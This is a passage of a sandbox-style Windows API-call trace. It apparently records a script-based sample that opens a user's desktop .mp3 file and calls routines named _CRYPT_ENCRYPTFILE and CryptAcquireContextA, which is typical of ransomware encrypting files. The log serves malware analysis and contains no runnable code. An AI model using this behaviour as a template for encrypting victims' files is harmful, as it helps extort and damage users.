[0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.895] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.896] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.896] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5c0exzdncgl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.897] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.897] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.897] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.897] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.897] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.898] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.898] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.898] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.898] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.898] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.898] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.898] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0075.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.898] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.898] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.898] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f8d00, ftCreationTime.dwHighDateTime=0x1d5df36, ftLastAccessTime.dwLowDateTime=0xb42994b0, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xb42994b0, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0xb2c5, dwReserved0=0x0, dwReserved1=0x657690, cFileName="5c0eXZdnCGl.mp3", cAlternateFileName="5C0EXZ~1.MP3")) returned 0x6b89b8 [0075.898] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.898] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f8d00, ftCreationTime.dwHighDateTime=0x1d5df36, ftLastAccessTime.dwLowDateTime=0xb42994b0, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xb42994b0, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0xb2c5, dwReserved0=0x0, dwReserved1=0x657690, cFileName="5c0eXZdnCGl.mp3", cAlternateFileName="5C0EXZ~1.MP3")) returned 0x6b89b8 [0075.898] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.899] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eXZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZdnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dnCGl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.900] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.900] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.900] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.900] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.900] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.900] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.900] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.900] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.900] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.900] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f8d00, ftCreationTime.dwHighDateTime=0x1d5df36, ftLastAccessTime.dwLowDateTime=0xb42994b0, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xb42994b0, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0xb2c5, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="5c0eXZdnCGl.mp3", cAlternateFileName="5C0EXZ~1.MP3")) returned 0x6b8b38 [0075.900] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.901] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.901] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.901] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.901] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.901] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.901] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.901] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.901] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.901] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.901] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.901] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.901] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.901] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.901] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0075.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.902] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x6969c0) returned 1 [0075.902] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.902] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.902] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.902] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.902] PeekMessageW 